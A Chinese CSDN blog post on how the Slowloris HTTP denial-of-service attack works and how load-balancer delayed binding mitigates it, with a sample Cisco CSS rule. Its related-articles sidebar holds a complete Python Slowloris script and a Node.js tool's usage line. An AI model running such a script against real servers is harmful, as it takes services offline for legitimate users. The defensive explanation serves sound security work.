Slowloris dos攻击的原理及防护

最新推荐文章于 2024-04-23 15:43:31 发布
最新推荐文章于 2024-04-23 15:43:31 发布
阅读量2.5k 收藏 2
点赞数
文章标签: 网络安全 dos http
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33869229/article/details/110518340
版权

反射攻击已经成为DDoS攻击的主要方式,在一些博客中也有论述。
最为常用的当属ddos反射放大攻击。但是如今,受政策影响,反射式攻击放缓。2018年,平均每个月反射攻击下降了0.93万次,非反射攻击增加了0.35万次。Slowloris dos就是一个鲜明的例子。

Slowloris是一个基于perl的HTTP客户机的名称,它可以用作对基于Apache的HTTP服务器和SQUID缓存代理服务器的拒绝服务。
它通过反复向服务器发起数百个有效的HTTP请求来操作,并使用最小数量的TCP流量保持这些连接打开,以消耗服务器资源。 一旦服务器资源耗尽,服务器将不再能够响应合法流量。

在这里插入图片描述
Slowloris是由“RSnake”撰写的,并在2009年6月17日的一篇ha.ckers.org博客中宣布。
截至2009年7月5日,易受攻击的HTTP服务器和代理包括:

Apache HTTP Server
IBM HTTP Server
IBM WebSphere Edge Server Caching Proxy
Squid caching proxy server

互联网上已经有很多关于HTTP服务器、HTTP代理和网络配置不受Slowloris影响的讨论。然而,基于我们的测试,这些观点错误的。 硬件负载均衡器通常自身不具备抗ddos功能,我们将在下面详细介绍。 此外,使用非默认的Slowloris设置拒绝服务可能会影响到其他并不相关的HTTP服务器和代理。

什么使Slowloris dos变得不同;
在我们探讨如何缓解Slowloris之前,先回顾一下是什么使Slowloris不同于其他拒绝服务。

  1. Slowloris流量使用合法的HTTP流量,并且不使用特定HTTP服务器中错误的HTTP请求。 因此,由于现有的IPS和IDS解决方案依赖于签名来检测攻击,通常不会识别Slowloris。(是不是和trojan FQ 有点像?)
    这意味着即使在标准的企业级IPS和IDS系统到位的情况下,Slowloris也能够有效。
  2. Slowloris是一个易于使用的perl脚本。虽然类似的dos已记录在安全刊物中,但RSnake提供了一个“武器化”的可利用脚本。再加上Apache对Slowloris很脆弱这一事实,脚本小子便有了一种简单的方法来拿下互联网的大部分。

硬件负载均衡器

导言
正如我们前面提到的,传统的观点是,如果您的基础设施支持硬件负载均衡器,那么您就不容易受到Slowloris的影响。 这不是真的。 即使配置正确,Slowloris也可以遍历硬件负载均衡器。 然而,许多负载平衡器可以被额外配置,进而能够保护您的基础设施免受Slowloris的影响。 这是怎么做的?

负载平衡器缓解

许多硬件负载均衡器,包括F5Big-IP、CiscoCSS、CiscoACE和CitrixNetScaler,都有一个通常称为延迟绑定的特性,即TCP拼接。 此功能允许负载均衡器允许客户端和虚拟IP地址(a.k.a之间的TCP三路握手。 配置在Web服务器前面的硬件负载均衡器)。 在此握手完成后,客户端将发送HTTP请求头,负载均衡器可以检查它,以确定对HTTP请求执行什么操作。负载均衡器可以配置为以多种方式响应客户端,例如发送HTTP302重定向,或者根据HTTP请求头中可识别的东西(如cookie、URL或User-Agent)选择适当的Web服务器来处理HTTP请求。
延迟绑定通常会导致负载均衡器执行HTTP请求头完整性检查,这意味着HTTP请求将不会被发送到适当的Web服务器,直到HTTP客户端发送最终的两个回车和行提要进行针对性绑定。 基本上,延迟绑定可以确保Web服务器或代理永远不会看到任何由Slowloris发送的不完整请求。 正因为如此,延迟绑定是防止Slowloris的一种非常有效的方法,但它必须正确配置。 接下来我们将讨论一个示例配置。

    content www_80_rule
    vip address 10.5.154.200
    protocol tcp
    port 80
    add service wwwserver1_80
    add service wwwserver2_80
    url "/*"
    active

第二行至最后一行(“url”/*“”)是启用在CiscoCSS上执行延迟绑定的Layer5规则的工具,如果没有在内容规则中启用此功能,任何基于Apache的HTTP服务器接收不完整的HTTP Header将容易受到此漏洞的影响。
其他负载平衡器,如F5Big-IP,可以使用类似的方法配置以防止Slowloris。
此硬件负载均衡器缓解仅适用于HTTP流量。至于如何防止基于SSL的攻击,看下篇文章分析。

参考链接:
https://lic.tumt.edu.tw/ezfiles/25/1025/img/16/232000252.pdf
https://www.freebuf.com/articles/database/201804.html
https://www.funtoo.org/Slowloris_DOS_Mitigation_Guide

矢沢心
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
什么是 Slowloris DDoS 攻击?
ZY_Eliza的博客
01-14 899
Slowloris 是一种拒绝服务攻击程序,它允许攻击者通过打开和维护攻击者和目标之间的许多并发HTTP连接来压倒目标服务器。 Slowloris 攻击是如何工作的? Slowloris 是一种应用层攻击,它利用部分 HTTP 请求进行操作。攻击的功能是打开与目标 Web 服务器的连接,然后尽可能长时间地保持这些连接打开。 Slowloris 不是一类攻击,而是一种特定的攻击工具,旨在允许单台机器在不使用大量带宽的情况下关闭服务器。与消耗带宽的基于反射的DDoS 攻击(例如NTP 放大)不同,这种..
Slowloris DOS攻击原理防护(续)
时光漫步
12-03 798
负载均衡器和SSL 我们已经解决了房子的HTTP侧,但是HTTPS(SSL)呢? 如果您有一个必须运行端到端加密的环境,并且使用SSL侦听器运行基于Apache的HTTP服务器,那么它很脆弱。 在基于Apache的SSL侦听器前面放置硬件负载均衡器并不能减轻这种漏洞。 这里有一个典型的场景: 客户端尝试HTTPS连接到Web站点。 加载均衡器“前端”网站,可能能够检测SSL会话ID,但不能检查SSL通信量,因此没有进一步的HTTP协议检查能力。 硬件负载均衡器将HTTPS连接发送回基于Apache的HTTP
HTTP慢连接攻击的原理和防范措施
最新发布
dexunyun的博客
04-23 1138
HTTP慢速连接攻击是CC攻击的变种,对任何一个允许HTTP访问的服务器,攻击者先在客户端上向该服务器建立一个content-length比较大的连接,然后通过该连接以非常低的速度(例如,1秒~10秒发一个字节)向服务器发包,并维持该连接不断开。攻击者就是利用了这点,对服务器发起一个HTTP请求,一直不停的发送HTTP头部,但是HTTP头字段不发送结束符,之后发送其他字段,而服务器在处理之前需要先接收完所有的HTTP头部,导致连接一直被占用,这样就消耗了服务器的连接和内存资源;
Slowloris DoS攻击原理与简单实现
沉在海里的鱼的博客
12-05 2745
Slowloris 攻击是我在李华峰老师的书——《Metasploit Web 渗透测试实战》里面看的,感觉既简单又使用,现在这种攻击是很容易被防护的啦。不过我也不敢真刀实战的去试,只是拿个靶机玩玩罢了。 废话还是写在结语里面吧。(划掉)结语可以不看(划掉) Slowloris 是一种资源消耗类DoS攻击,它利用部分HTTP请求进行操作。也叫做慢速攻击,这里的慢速并不是说发动攻击慢,而是访问一条链接的速度慢。Slowloris攻击的功能是打开与目标Web服务器的连接,然后尽可能
网络安全HTTP Slowloris攻击原理解析
par@ish的博客
12-13 1578
Slowloris是一种针对Web服务器的攻击方式。它利用了服务器在处理HTTP连接时的一些弱点,通过向服务器发送大量的HTTP请求,但在每个请求的头部只发送部分数据并保持连接不断开的方式来耗尽服务器资源。
RSNAKE 的 Slowloris DOS攻击工具初试
07-16 366
Slowloris 号称低带宽对服务器进行DDOS攻击 原理就是对WEB服务器发送 不完整的包并且以 单一 \r\n结尾,并不是 完整的HTTP包。造成WEB服务器堵塞达到最大连接数。 官网给出介绍,对以下几种服务器有效: Apache 1.x Apache 2.x dhttpd GoAhead WebServer WebSense "block pages" ...
slowloris-dos:一个用 node.js 编写的 sloworis 拒绝服务攻击应用程序
06-02
慢猪 ... cd /path/to/slowloris-dos/ 3. 安装项目特定的依赖项 在命令行界面输入: npm install 4. 执行 node index.js [target] [socks address] node index.js http://example.com localhost:9051
软件安全测试·DoS·HTTP慢速攻击
06-22
slowhttptest 工具可以模拟多种慢速攻击方式,包括 SlowlorisSlow HTTP POST DoS 攻击。 使用 slowhttptest 工具需要按照以下步骤进行: 1. 安装 slowhttptest 工具:slowhttptest 可以在 Kali Linux 中安装,...
slowloris:低带宽DoS工具。 Slowloris用Python重写
05-11
Slowloris基本上是一种HTTP拒绝服务攻击,会影响线程服务器。 它是这样的: 我们开始发出许多HTTP请求。 我们会定期(每15秒发送一次)发送标头,以保持连接畅通。 除非服务器关闭连接,否则我们永远不会关闭...
Orignal-Slowloris-HTTP-DoS:由于http
06-08
Orignal-Slowloris-HTTP-DoS 由于已下线,我将在此处上传原始脚本。
slowloris.py_SingleandSingle_slowloris_源码
10-02
lowloris is a type of denial of service attack tool which allows a single machine to take down another machine's web server with minimal bandwidth and side effects on unrelated services and ports.
Slowloris攻击与防御?--Ecloud(易刻得)专栏
Ecloud的博客
10-27 618
Slowloris攻击也称为 Slowloris拒绝服务攻击,一种慢速连接攻击。 Slowloris是什么? Slowloris也是拒绝服务攻击的一种,常见的DDOS攻击有SYN Flood , UDP Flood , ICMP Flood等。其中SYN Flood是一种非常经典的DDOS攻击。其利用的是TCP协议设计中的缺陷进行攻击的。前篇我们已经提到过,这里暂且不提。而Slowloris攻击则是利用Http协议的漏洞或设计缺陷,直接造成拒绝服务。 起源 Slowloris是在2009..
Slowloris攻击与Netflow
weixin_42486226的博客
04-27 193
Slowloris是网络攻击中比较老牌的选手了,关于它的防范技术也都很成熟,如果加上Netflow技术,其实可以做到更多。
浅谈Slowloris拒绝服务攻击
热门推荐
梦落红尘
10-30 1万+
DDOS又称为分布式拒绝服务,全称是Distributed Denial of Service。DDOS本是利用合理的请求造成资源过载,导致服务不可用。比如一个停车场共有100车位,当100车位都停满后,再有车想要停进来,就必须等待已有的车先出去才行。如果已有的车一直不出去,那么停车场的入口就会排气长队,停车场的负荷过载,不能正常工作了,这种情况就是“拒绝服务”。         常见的DD
什么是慢速攻击?
m0_66268916的博客
01-02 560
慢速攻击(Slowloris attack)是一种网络攻击技术,旨在通过占用服务器上的所有可用连接来使其不可用。与传统的拒绝服务(DoS)和分布式拒绝服务(DDoS)攻击不同,慢速攻击利用服务器的资源限制来达到目的,而不是通过发送大量数据包来消耗带宽。 慢速攻击的原理是利用 HTTP 协议的特性,在发起请求后,保持连接处于 “半开放” 状态。攻击者通过发送大量的 HTTP 请求,并以极其缓慢的速度来发送请求头部,但不发送完整的请求内容或维持连接的状况,使得服务器上的连接不断增加,占用了可用的连接资源,最终
Dos攻击的方式及解决方案
hell87的博客
08-23 3720
DOS攻击方式及解决方案
Slowloris HTTP DoS ***工具介绍
weixin_33951761的博客
03-15 327
Dos***在现在网络中屡见不鲜,下面就介绍其中的一款有名的工具Slowloris HTTP DoS的工作原理,供大家做研究用,如用于非法目的,由此引起的后果自负。In considering the ramifications of a slow denial of service attack against particular services, rather t...
Slowhttptest攻击原理
root143的博客
03-16 5027
Slowhttptest其实是一个DoS压力测试工具,它集成有三种慢速攻击模式(slowlorisslow http post、slow read attack),并且能导出日志报告,节约了部分写文档的时间,是一个特别好用且强大的工具,下面笔者将逐个分析它主要的攻击模式及防御方法。一、Slowhttptest安装Mac安装命令:brew update && brew instal...
网络攻防之DDOSslowloris
qq_34597894的博客
10-16 3371
描述: DDOS又称为分布式拒绝服务,全称是Distributed Denial of Service。DDOS本是利用合理的请求造成资源过载,导致服务不可用。比如一个停车场共有100车位,当100车位都停满后,再有车想要停进来,就必须等待已有的车先出去才行。如果已有的车一直不出去,那么停车场的入口就会排气长队,停车场的负荷过载,不能正常工作了,这种情况就是“拒绝服务”。 常...
slowloris攻击python
03-06
Slowloris攻击是一种利用HTTP协议的漏洞进行的拒绝服务(DoS)攻击。它通过发送大量的半连接(Half-open connections)来耗尽目标服务器的资源,从而使其无法正常响应其他合法用户的请求。 在Python中,可以使用socket库来实现Slowloris攻击。下面是一个简单的示例代码: ```python import socket import random import time def slowloris_attack(target_host, target_port, num_connections): # 创建指定数量的socket连接 sockets = [] for _ in range(num_connections): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(4) s.connect((target_host, target_port)) sockets.append(s) # 发送HTTP请求头部 headers = "GET / HTTP/1.1\r\n" + \ "Host: " + target_host + "\r\n" + \ "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\r\n" + \ "Accept-language: en-US,en,q=0.5\r\n" + \ "Connection: keep-alive\r\n" + \ "Content-Length: 42\r\n" # 持续发送数据 while True: for s in sockets: try: s.send(headers.encode()) except socket.error: sockets.remove(s) # 随机延迟发送时间 time.sleep(random.randint(1, 10)) # 使用示例 target_host = "example.com" target_port = 80 num_connections = 100 slowloris_attack(target_host, target_port, num_connections) ``` 请注意,上述代码仅供学习和研究目的,请勿用于非法用途。进行任何未经授权的攻击是违法行为,可能会导致严重的法律后果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

矢沢心

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值